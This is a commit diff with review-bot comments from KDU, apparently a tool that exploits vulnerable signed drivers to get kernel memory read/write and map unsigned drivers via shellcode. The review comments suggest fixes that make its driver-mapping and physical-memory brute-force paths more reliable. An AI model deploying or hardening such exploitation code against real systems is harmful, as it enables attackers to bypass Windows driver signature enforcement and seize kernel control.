Internal rearrange
hfiref0x committed Mar 24, 2023
1 parent 07ec6e6 commit 8c37768
Showing 6 changed files with 102 additions and 48 deletions.
10 changes: 5 additions & 5 deletions KDU.sha256
Expand Up @@ -26,7 +26,7 @@ f12057a99c6b20abf6d9c3df949d794b124ca19b189498ce2beaa5beeb2b077c *Source\Hamakaz
09fa3cdaa1416b81ba5ee304cf24897726902b9d33a76d879f604b7fe26b4dcc *Source\Hamakaze\compress.h
09970cfcb9bfb7a8964ae4ec48fd15c1805e93ea81c858de2793691eefda3881 *Source\Hamakaze\diag.cpp
a4fa97b9f2be414bc49881450d5935d2b48c1029d3bee655cd6e77e645327d74 *Source\Hamakaze\diag.h
4894e61226774096e0923164898f314e3ff203d34344df35b936b18f3663e3e7 *Source\Hamakaze\drvmap.cpp
7b15ce1e8654f24a9ac70fdae618fe6c96684bf8462e27d2835da617a51f3308 *Source\Hamakaze\drvmap.cpp
c62c75c00882d816856f56005eec67a82cf56179d2a4629c4c8bf53707c16c25 *Source\Hamakaze\drvmap.h
46a4fd4dacc53b917a0894542c786c5db08ac662157438447fa89f71afa615c5 *Source\Hamakaze\dsefix.cpp
5131aa81ffb17238a092b313a954a6d9e9203636ba47562f0a7f8d4daf306221 *Source\Hamakaze\dsefix.h
Expand All @@ -37,7 +37,7 @@ ea0d8d42a5e7d7fb908c52351f99c69f2019c105d07a1f536756691ab2a74174 *Source\Hamakaz
a62576fdaf4fa1fa3782427c9662c7708af81a81b5703ce8d1a5d3bb4d680bde *Source\Hamakaze\KDU.vcxproj.filters
b3272c6ec95065c5d293cd256f6f395d1d7b6b8dcac6e49cb1d96806d563593e *Source\Hamakaze\KDU.vcxproj.user
a224b5276d3006e16d8bb6b5ef6c701842678612dbcfafb53a840eb174ecfca2 *Source\Hamakaze\kduplist.h
e4008c31f4e819a8920f932f763ecd01a6510715cf6b391354eea281321afe86 *Source\Hamakaze\kduprov.cpp
4622665b799f0b2a5c77f4dfafc250c4d882fc3105cf9306fc888f678cd8563b *Source\Hamakaze\kduprov.cpp
13a842b3bc62995ab8071ae56df74065d6a1388fcda66884012c6d8addb94055 *Source\Hamakaze\kduprov.h
ace87ca919d2502c47d147814808e42b892b38cf9092aa69a3dad5f44da05323 *Source\Hamakaze\main.cpp
e1a8de39e2d3d0bae5d9bbe1b18e849f5d070feb1d37f838176ede5a401f35ec *Source\Hamakaze\pagewalk.cpp
Expand All @@ -52,7 +52,7 @@ c617a2090e51738ba9aadff46c573fcf57caada21219ed673ee0f8998e35a831 *Source\Hamakaz
879eea1c38c0c408e3634d0ed2eeae2b8b21e1040b4b0988ea4d802de0ecd21e *Source\Hamakaze\sig.h
7f97a97deea91390c87c759869e069635be6a329ffc941d53da86cfa0ecf1522 *Source\Hamakaze\sup.cpp
a13d8320351de7e0366dc935271be1e53bd0e69fa02f3141de67cbf71e5f3155 *Source\Hamakaze\sup.h
31ca945f51fd2779e827d0c9cd9dfd58f33d532b0bee00d0aa044910ab71e05c *Source\Hamakaze\tests.cpp
69fc5422986ab04061534187cd268026be3eba3f38600a3a7b173ee6314b7549 *Source\Hamakaze\tests.cpp
ad77ae168188a9748713ab5f7532447ca50a539fa8ebbec5ac86b273696b028e *Source\Hamakaze\tests.h
8046da85c2f9853496b369fa63fe1b89d47583d5367db4a49edfd9f52426e6d7 *Source\Hamakaze\victim.cpp
5b82accd00d244d77f107a7b8ff0253548a463e642976c36f76e85649e60fe8e *Source\Hamakaze\victim.h
Expand All @@ -63,7 +63,7 @@ fd5b39e2865e12b9525ebda8fd9e9658b341ead5932d1bcb412a189f81ca42ca *Source\Hamakaz
0b6c69ad498e67907e0c574ab06123aee4ec30c99fa181099ea929a8d820bfc1 *Source\Hamakaze\hde\table64.h
76295f1463903ba5ed48ec7e04bb7c43ec4f0b76f112141aedcdbc6cc3355039 *Source\Hamakaze\idrv\alcpu.cpp
98a21df59cb881c1029a8a6c1ad30c9481075c2e4b1fb43969ee6607816b9c9f *Source\Hamakaze\idrv\alcpu.h
251fc648b3592c5e9b9e6085b5a58786ae0b2690b0cd85d9fc4f8a7c80689b84 *Source\Hamakaze\idrv\asrdrv.cpp
de5286bda6dd23940fb2cc0f0e5d3cd12bad73ffdcf30259bc254047a5f1142f *Source\Hamakaze\idrv\asrdrv.cpp
1c2c5b6a7addf3389a6dee6b11e4a4648d403e9c456008ecefbc79deaa34afae *Source\Hamakaze\idrv\asrdrv.h
b1350783a851e6345b880c8a5313e871d2249aa5524f41406c52fa62483f2229 *Source\Hamakaze\idrv\atszio.cpp
015a6aff991174a881650c61fe1b28c5bfe3116a02a32abe5295ff389c5b7099 *Source\Hamakaze\idrv\atszio.h
Expand Down Expand Up @@ -102,7 +102,7 @@ a0ed8a22c14b35bccd1ff0f45c8b23cad0f8c3af1d8e924caf4bfd63dfb02d89 *Source\Hamakaz
36ec0baeec7b61dbd9936507fcf1bf5aefec08e96ffe3bcb4883785ea2d9a542 *Source\Hamakaze\idrv\rzpnk.h
48cd4fcd61fb5649064726cb7cc42e9977240c11731cf32a4e971eb39ab51b3d *Source\Hamakaze\idrv\winio.cpp
d0e354d2f97e993e5e40fb6bb2b99b5bc753beb23f8213d44f99c0309210c1e8 *Source\Hamakaze\idrv\winio.h
57735ccbb0e84b63a6ffc950b2b392125940cee52012bfe0c762c56144e34e2b *Source\Hamakaze\idrv\winring0.cpp
21c357fab30206cb0942e2fbfef6716b2f315d3620827ee32db451a2ebbc3c7d *Source\Hamakaze\idrv\winring0.cpp
103f50efe410f8668c40ddc68051ba49aa0ee1a5301cb54bc42991523c0edae9 *Source\Hamakaze\idrv\winring0.h
524cb55125d1998b60a259ce689164494810979ade21bf5d23e658feeef845f2 *Source\Hamakaze\idrv\zemana.cpp
da1ea3c2ceebfdc6e5c338461dc214798870a0d6aa16f7f23c045123fa450f71 *Source\Hamakaze\idrv\zemana.h
16 changes: 5 additions & 11 deletions Source/Hamakaze/drvmap.cpp
Expand Up @@ -694,15 +694,13 @@ BOOL KDUpMapDriverPhysicalSection(
supPrintfEvent(kduEventError,
"[!] Shellcode did not trigger the event within two seconds.\r\n");

bSuccess = FALSE;
}
else
{
KDUShowPayloadResult(Context, ScSectionHandle);
bSuccess = TRUE;
}

bSuccess = TRUE;

} while (FALSE);

//
Expand Down Expand Up @@ -766,19 +764,18 @@ BOOL KDUpMapDriverPhysicalBruteForce(
supPrintfEvent(kduEventError,
"[!] Shellcode did not trigger the event within two seconds.\r\n");

bSuccess = FALSE;
}
else
{
KDUShowPayloadResult(Context, ScSectionHandle);
bSuccess = TRUE;
}

}
else {
supPrintfEvent(kduEventError,
"[!] Failed to enumerate physical memory.\r\n");

bSuccess = FALSE;
}

//
Expand Down Expand Up @@ -826,7 +823,6 @@ BOOL KDUpMapDriverDirectVM(
supPrintfEvent(kduEventError,
"[!] Error writing shellcode to the target driver, abort\r\n");

bSuccess = FALSE;
}
else {

Expand All @@ -846,11 +842,11 @@ BOOL KDUpMapDriverDirectVM(
supPrintfEvent(kduEventError,
"[!] Shellcode did not trigger the event within two seconds.\r\n");

bSuccess = FALSE;
}
else
{
KDUShowPayloadResult(Context, ScSectionHandle);
bSuccess = TRUE;
}
}

Expand Down Expand Up @@ -937,13 +933,11 @@ BOOL KDUMapDriver(

printf_s("[+] Query victim loaded driver layout\r\n");

bSuccess = VpQueryInformation(
if (VpQueryInformation(
Context->Victim,
VictimDriverInformation,
&vdi,
sizeof(vdi));

if (bSuccess)
sizeof(vdi)))
{

targetAddress = vdi.LoadedImageBase + dispatchOffset;
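Review bot: In the first hunk (KDUpMapDriverPhysicalSection) the `bSuccess = TRUE;` moved below the if/else now also runs on the timeout branch, so the function reports success immediately after printing the error-level "Shellcode did not trigger the event" message, and the same pattern appears in KDUpMapDriverPhysicalBruteForce and KDUpMapDriverDirectVM. If the intent is that the payload is already written and triggered by this point and the event only confirms it ran, say so where the flag is set, e.g. `// Payload is already mapped and triggered; a missed ready event is reported but not treated as failure.` — otherwise keep `bSuccess = FALSE;` on the timeout branch so callers can tell the cases apart. In the last hunk the result of VpQueryInformation no longer reaches bSuccess, so the value KDUMapDriver returns when that query fails now depends on an assignment outside the hunk; worth confirming it is initialised to FALSE. All four functions start and end outside the hunks shown.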
2 changes: 1 addition & 1 deletion Source/Hamakaze/idrv/asrdrv.cpp
Expand Up @@ -133,7 +133,7 @@ BOOL AsrEncryptDriverRequest(
if (hAlgAes != NULL)
BCryptCloseAlgorithmProvider(hAlgAes, 0);

if (bResult && cbResult) {
if (bResult && cbResult && pbCipherData) {

ULONG outSize = sizeof(ASRDRV_REQUEST) +
cbResult +
2 changes: 1 addition & 1 deletion Source/Hamakaze/idrv/winring0.cpp
Expand Up @@ -44,7 +44,7 @@ BOOL WRZeroReadPhysicalMemory(
return supCallDriver(DeviceHandle,
IOCTL_OLS_READ_MEMORY,
&request,
sizeof(request),
sizeof(OLS_READ_MEMORY_INPUT),
Buffer,
NumberOfBytes);
}
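Review bot: Passing `sizeof(OLS_READ_MEMORY_INPUT)` instead of `sizeof(request)` decouples the input length from the variable actually handed to the driver, and nothing in the hunk shows what `request` is declared as. If it is an OLS_READ_MEMORY_INPUT the two are equal and `sizeof(request)` is the form that cannot drift; if `request` is a larger structure and the driver must only see the input header, that deserves a line above the call, e.g. `// IOCTL_OLS_READ_MEMORY takes only the OLS_READ_MEMORY_INPUT header, not the whole request.` The declaration of `request` and the start of WRZeroReadPhysicalMemory are outside the hunk.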
81 changes: 65 additions & 16 deletions Source/Hamakaze/kduprov.cpp
Expand Up @@ -679,6 +679,25 @@ HINSTANCE KDUProviderLoadDB(
return hInstance;
}

BOOL KDUpRwHandlersAreSet(
_In_ PVOID ReadHandler,
_In_ PVOID WriteHandler
)
{
if (ReadHandler == NULL ||
WriteHandler == NULL)
{

supPrintfEvent(kduEventError, "[!] Abort: selected provider does not support arbitrary kernel read/write or\r\n"\
"\tKDU interface is not implemented for these methods.\r\n");

return FALSE;

}

return TRUE;
}

/*
* KDUProviderVerifyActionType
*
Expand All @@ -688,11 +707,11 @@ HINSTANCE KDUProviderLoadDB(
*
*/
BOOL KDUProviderVerifyActionType(
_In_ KDU_PROVIDER * Provider,
_In_ KDU_PROVIDER* Provider,
_In_ KDU_ACTION_TYPE ActionType)
{
BOOL bResult = TRUE;

#ifdef _DEBUG
return TRUE;
#endif
Expand All @@ -713,15 +732,33 @@ BOOL KDUProviderVerifyActionType(
return FALSE;
}

if (Provider->LoadData->PhysMemoryBruteForce &&
(Provider->Callbacks.ReadPhysicalMemory == NULL ||
Provider->Callbacks.WritePhysicalMemory == NULL))
{
supPrintfEvent(kduEventError, "[!] Abort: selected provider does not support physical memory read/write or\r\n"\
"\tKDU interface is not implemented for these methods.\r\n");

return FALSE;
if (Provider->LoadData->PreferPhysical || Provider->LoadData->PhysMemoryBruteForce) {

//
// Driver must have at least something defined.
//
BOOL bFirstTry = TRUE, bSecondTry = TRUE;

if (Provider->Callbacks.ReadPhysicalMemory == NULL ||
Provider->Callbacks.WritePhysicalMemory == NULL)
{
bFirstTry = FALSE;
}

if (Provider->Callbacks.ReadKernelVM == NULL ||
Provider->Callbacks.WriteKernelVM == NULL)
{
bSecondTry = FALSE;
}

if (bFirstTry == NULL && bSecondTry == NULL) {
supPrintfEvent(kduEventError, "[!] Abort: selected provider does not support arbitrary kernel read/write or\r\n"\
"\tKDU interface is not implemented for these methods.\r\n");
return FALSE;
}

}

break;

default:
Expand All @@ -735,16 +772,28 @@ BOOL KDUProviderVerifyActionType(
//
// Check if we can read/write.
//
if (Provider->Callbacks.ReadKernelVM == NULL ||
Provider->Callbacks.WriteKernelVM == NULL)
{

supPrintfEvent(kduEventError, "[!] Abort: selected provider does not support arbitrary kernel read/write or\r\n"\
"\tKDU interface is not implemented for these methods.\r\n");
if (Provider->LoadData->PreferPhysical) {

bResult = FALSE;
if (!KDUpRwHandlersAreSet(
(PVOID)Provider->Callbacks.ReadPhysicalMemory,
(PVOID)Provider->Callbacks.WritePhysicalMemory))
{
bResult = FALSE;
}

}
else {

if (!KDUpRwHandlersAreSet(
(PVOID)Provider->Callbacks.ReadKernelVM,
(PVOID)Provider->Callbacks.WriteKernelVM))
{
bResult = FALSE;
}

}

break;

case ActionTypeMapDriver:
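Review bot: The replacement check under `if (Provider->LoadData->PreferPhysical || Provider->LoadData->PhysMemoryBruteForce)` is weaker than the lines it removes: a provider flagged PhysMemoryBruteForce with no ReadPhysicalMemory/WritePhysicalMemory handlers now passes as long as the kernel VM handlers exist, yet the brute-force path is fed exactly those physical handlers (tests.cpp copies them into KDU_PHYSMEM_ENUM_PARAMS), so it would presumably run with NULL callbacks unless there is a fallback not visible here. The condition `if (bFirstTry == NULL && bSecondTry == NULL)` also compares BOOLs against a pointer constant; `if (!bFirstTry && !bSecondTry)` says what is meant. I would keep the physical-handler requirement when PhysMemoryBruteForce is set and apply the "anything defined" test only for PreferPhysical, as sketched below. KDUpRwHandlersAreSet has no declaration in any header visible here and looks file-local, so `static` would keep it out of the global namespace. KDUProviderVerifyActionType starts before and ends after the hunks shown.
```cpp
    if (Provider->LoadData->PreferPhysical || Provider->LoadData->PhysMemoryBruteForce) {

        BOOL bHavePhysical = (Provider->Callbacks.ReadPhysicalMemory != NULL &&
            Provider->Callbacks.WritePhysicalMemory != NULL);
        BOOL bHaveVirtual = (Provider->Callbacks.ReadKernelVM != NULL &&
            Provider->Callbacks.WriteKernelVM != NULL);

        //
        // Brute force mode is driven by the physical memory handlers
        // (they are what KDU_PHYSMEM_ENUM_PARAMS carries), so require them.
        //
        if (Provider->LoadData->PhysMemoryBruteForce && !bHavePhysical) {
            supPrintfEvent(kduEventError, "[!] Abort: selected provider does not support physical memory read/write or\r\n"\
                "\tKDU interface is not implemented for these methods.\r\n");
            return FALSE;
        }

        //
        // PreferPhysical only needs some read/write primitive to exist.
        //
        if (!bHavePhysical && !bHaveVirtual) {
            supPrintfEvent(kduEventError, "[!] Abort: selected provider does not support arbitrary kernel read/write or\r\n"\
                "\tKDU interface is not implemented for these methods.\r\n");
            return FALSE;
        }

    }
```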
39 changes: 25 additions & 14 deletions Source/Hamakaze/tests.cpp
Expand Up @@ -115,26 +115,37 @@ BOOL WINAPI TestPhysMemEnumCallback(
VOID TestBrute(PKDU_CONTEXT Context)
{
KDU_PHYSMEM_ENUM_PARAMS params;
VICTIM_IMAGE_INFORMATION vi;
HANDLE victimDeviceHandle = NULL;

params.DeviceHandle = Context->DeviceHandle;
params.ReadPhysicalMemory = Context->Provider->Callbacks.ReadPhysicalMemory;
params.WritePhysicalMemory = Context->Provider->Callbacks.WritePhysicalMemory;
if (VpCreate(Context->Victim, Context->ModuleBase, &victimDeviceHandle, NULL, NULL)) {

params.DispatchSignature = Context->Victim->Data.DispatchSignature;
params.DispatchSignatureLength = Context->Victim->Data.DispatchSignatureLength;
RtlSecureZeroMemory(&vi, sizeof(vi));
VpQueryInformation(Context->Victim, VictimImageInformation, &vi, sizeof(vi));

params.bWrite = FALSE;
params.cbPayload = 0;
params.pvPayload = NULL;
params.ccPagesFound = 0;
params.ccPagesModified = 0;
params.DeviceHandle = Context->DeviceHandle;
params.ReadPhysicalMemory = Context->Provider->Callbacks.ReadPhysicalMemory;
params.WritePhysicalMemory = Context->Provider->Callbacks.WritePhysicalMemory;

if (supEnumeratePhysicalMemory(TestPhysMemEnumCallback, &params)) {
params.DispatchSignature = Context->Victim->Data.DispatchSignature;
params.DispatchSignatureLength = Context->Victim->Data.DispatchSignatureLength;

printf_s("[+] Number of pages found: %llu\r\n", params.ccPagesFound);
params.DispatchHandlerOffset = vi.DispatchOffset;
params.DispatchHandlerPageOffset = vi.DispatchPageOffset;
params.JmpAddress = vi.JumpValue;

params.bWrite = FALSE;
params.cbPayload = 0;
params.pvPayload = NULL;
params.ccPagesFound = 0;
params.ccPagesModified = 0;

if (supEnumeratePhysicalMemory(TestPhysMemEnumCallback, &params)) {

printf_s("[+] Number of pages found: %llu\r\n", params.ccPagesFound);

}
}

}

VOID KDUTest()
Expand All @@ -146,7 +157,7 @@ VOID KDUTest()

RtlSecureZeroMemory(&Buffer, sizeof(Buffer));

Context = KDUProviderCreate(KDU_PROVIDER_HR_PHYSMEM,
Context = KDUProviderCreate(KDU_PROVIDER_WINRING0,
FALSE,
NT_WIN7_SP1,
KDU_SHELLCODE_V1,
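Review bot: In TestBrute the return value of `VpQueryInformation(Context->Victim, VictimImageInformation, &vi, sizeof(vi));` is dropped, so when the query fails the freshly zeroed vi feeds DispatchHandlerOffset, DispatchHandlerPageOffset and JmpAddress with zeros and the physical memory walk still runs against a bogus dispatch location. Gate the enumeration on it the same way the function already gates on VpCreate: `if (VpQueryInformation(Context->Victim, VictimImageInformation, &vi, sizeof(vi))) {` around the params setup and the supEnumeratePhysicalMemory call, with an `else { supPrintfEvent(kduEventError, "[!] Cannot query victim image information\r\n"); }`. The handle returned in `victimDeviceHandle` is also never closed and the victim is never released anywhere in the function as shown, which would leave the victim driver loaded after the test; confirm whether KDUTest or the provider teardown takes care of that, and if not add the matching release before the function returns.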
